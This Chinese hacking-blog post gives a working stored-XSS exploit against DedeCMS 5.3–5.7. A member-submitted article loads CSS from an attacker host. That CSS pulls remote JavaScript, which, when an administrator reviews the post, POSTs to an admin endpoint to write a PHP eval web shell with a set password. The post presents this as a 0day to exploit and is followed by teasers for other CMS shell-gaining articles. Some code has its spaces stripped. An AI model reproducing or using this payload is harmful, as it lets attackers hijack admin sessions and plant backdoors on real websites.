dede xss通杀所有版本漏洞

hacker5年前黑客文章1214

漏洞原因:DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用 *** 。条件有2个:开启注册开启投稿注册会员-发表文章投稿,

内容如下填写:

<style>@im\port'\http://92kuwo.com/xss.css';</style>

在你自己的网站92kuwo.com上新建xss.css内容如下:

body{background-image:url('javascript:document.write("<scriptsrc=http://xxx.com/xss.js></script>")') }
在你自己的网站xxx.com上新建xss.js 内容如下:

varrequest =false;
if(window.XMLHttpRequest){request =newXMLHttpRequest();
if(request.overrideMimeType){request.overrideMimeType('text/xml');}}
elseif(window.ActiveXObject){varversions =['Microsoft.XMLHTTP','MSXML.XMLHTTP','Microsoft.XMLHTTP','Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0','Msxml2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP'];for(vari=0;i<versions.length;i++){try{request =newActiveXObject(versions);}catch(e){}}}xmlhttp=request;functiongetFolder(url ){obj =url.split('/')returnobj[obj.length-2]}oUrl =top.location.href;u =getFolder(oUrl);add_admin();functionadd_admin(){varurl="/"+u+"/sys_sql_query.php";varparams ="fmdo=edit&backurl=&activepath=%2Fdata&filename=92kuwo.php&str=<%3Fphp+eval%28%24_POST%5B0day5%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";xmlhttp.open("POST",url,true);xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlhttp.setRequestHeader("Content-length",params.length);xmlhttp.setRequestHeader("Connection","Keep-Alive");xmlhttp.send(params);}

当管理员审核这篇文章的时候,将自动在data目录生成一句话92kuwo.php。密码0day5。

标签: 黑客技术

相关文章

Dedecms某一处insert型注入

Dedecms某一处insert型注入

Dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的,目前最新版本应该是没修复的 漏洞需要会员,所以比较鸡肋啦! 发表文章处,post表单的mtypes...

WindowsServer2003R2版本号IIS6

WindowsServer2003R2版本号IIS6

今天第三篇实例教程,大家立即用CVE-2017-7269系统漏洞开展一次实战演练检测。三篇文章内容你融汇贯通了,基础算黑客入门了。   微软公司层面也早已确定了该系统漏洞:Windows...

文中关键解读nmap的诸多脚本制作的应用

文中关键解读nmap的诸多脚本制作的应用

文中关键解读nmap的诸多脚本制作的应用,在内网渗透的情况下特别是在功能强大。   Nmap好多个小实例: nmap -T4 -A -v 192.168.10.100 nmap -A -...

Fiddler是一款免费代理商调节专用工具

Fiddler是一款免费代理商调节专用工具

Fiddler是一款免费代理商调节专用工具。   Fiddler是一个蛮好用的抓包工具,能够将数据传输推送与接纳的数据文件开展捕获、再发、编写、拷贝到等实际操作。还可以用于检验网络信息安全...

Retina的典型性主要用途是啥?

Retina的典型性主要用途是啥?

什么叫Retina? Retina是安全性制造行业最受尊重和业内认证的漏洞检测程序流程之一,是大家的漏洞管理解决方法的模块。沒有更强的挑选来维护您的互联网免遭系统漏洞的进攻。   Reti...

科讯kesioncms 5.5以下漏洞后台拿shell

科讯kesioncms 5.5以下漏洞后台拿shell

科讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。由于科讯的后台登陆需要输入认证码,而认证码没有保存在数据库而是保存在asp文件中,所以在某种程度上增...